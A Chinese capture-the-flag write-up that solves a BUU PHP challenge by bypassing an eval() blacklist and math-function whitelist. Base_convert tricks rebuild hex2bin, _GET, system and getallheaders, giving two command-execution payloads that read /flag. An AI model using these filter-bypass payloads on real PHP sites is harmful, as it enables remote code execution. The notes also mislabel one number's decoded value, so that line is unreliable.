前言
今天做到了一个有趣的题目,是对PHP函数的灵活运用,灵活转码,达到绕过设置的黑白名单的目的,实现命令的执行,总之题目很灵活o(╥﹏╥)o给虐哭了,看了大佬们的博客才懂得灵活运用一些神奇的函数,还有最多有三十六进制,所以有些进制会带有字母,所以造成了漏洞啊!!!
一、前置知识
先附上一些wp: 大佬博客讲解1 大佬博客讲解2 大佬博客讲解3
好用的网址: 任意进制的转换
一些函数: base_convert(number,frombase,tobase);:在任意进制之间转换数字。 dechex() 函数:把十进制转换为十六进制。 hex2bin() 函数:把十六进制值的字符串转换为 ASCII 字符。
getallheaders函数讲解:
 如上图所示,getallheaders可以返回header这个数组全部信息,就是返回所有http请求头信息,如果只需要某一个头部的信息,使用键值取出即可:例getallheaders()[host]
eval() 函数:把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。
一些小知识点: 37907361743(十进制):hex2bin(36进制) _GET(36进制):5f474554(十六进制) 1598506324(十进制) 1751504350(十进制):system(36进制) 8768397090111664438(十进制):cat /flag(三十进制)
{}花括号可以代替[]方括号
二、解题过程
从BUU打开题目环境,一进去就发现了源码:
<?php
error_reporting(0);
if(!isset($_GET['c'])){
show_source(__FILE__);
}else{
$content = $_GET['c'];
if (strlen($content) >= 80) {
die("太长了不会算");
}
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $content)) {
die("请不要输入奇奇怪怪的字符");
}
}
$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
foreach ($used_funcs[0] as $func) {
if (!in_array($func, $whitelist)) {
die("请不要输入奇奇怪怪的函数");
}
}
eval('echo '.$content.';');
}
经过对上面源码的分析,我们可以知道通过get传参传入c并赋值给content这个变量,然后对content进行了黑名单过滤和白名单过滤,最后用eval函数对content解析执行并输出了。(注意还有一个限制条件,构造的payload不能太长,小于80啊!!!)
看得到黑名单过滤了一些特殊字符,白名单有限制字母只能是那些数学函数名,可真难办啊,去看了大佬的blog,学习了两种方法,不过都是基于base_convert这个进制转换函数:
①构造$_GET进行传参造成命令执行:
payload:
?tan=system&abs=cat /flag&c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{tan}($$pi{abs})
解析:记得利用同名的数学函数做变量
利用c传参传递变量$pi
base_convert(37907361743,10,36)(dechex(1598506324)):
首先是base_convert(37907361743,10,36)十进制转换为三十六进制变成了hex2bin,
然后dechex(1598506324)被hex2bin转化过后就是_GET
即$pi=_GET,所以$$pi=$_GET,由于{}花括号可以代替[]方括号,
所以可以使用$_GET{},在分别传参tan=system和abs=cat /flag就可以造成命令执行了
 ②利用getallheaders函数,改写头部信息造成漏洞: payload:这个使用burpsuit方便一点,记得在头部那里添加一个你要执行的 命令的信息!!!
?c=$pi=base_convert;$pi(1751504350,10,36)($pi(8768397090111664438,10,30)(){1})
解析:
传参进来,令$pi=base_convert
(1751504350,10,36):十进制转换为三十六进制就是system
(8768397090111664438,10,30)(){1}:
首先(8768397090111664438,10,30)转换一下就是getallheaders(我尝试了很多遍,
发现就只有十进制转化为三十进制的时候才能成功,不知道为什么o(╥﹏╥)o麻了),
加个()就可以执行这个函数,就会返回来一个数组,然后[1]的意思就是取出键名为1的那个元素的值。
**记得在头部添加信息!!!如下图**

总结
做完这题,感觉php的一些函数是真的奇妙,我也明白自己的php的基础不太行,没有系统学过,基本都是做题审计出来的。。。还是需要认真地去学习一下php的一些基础知识!!!
|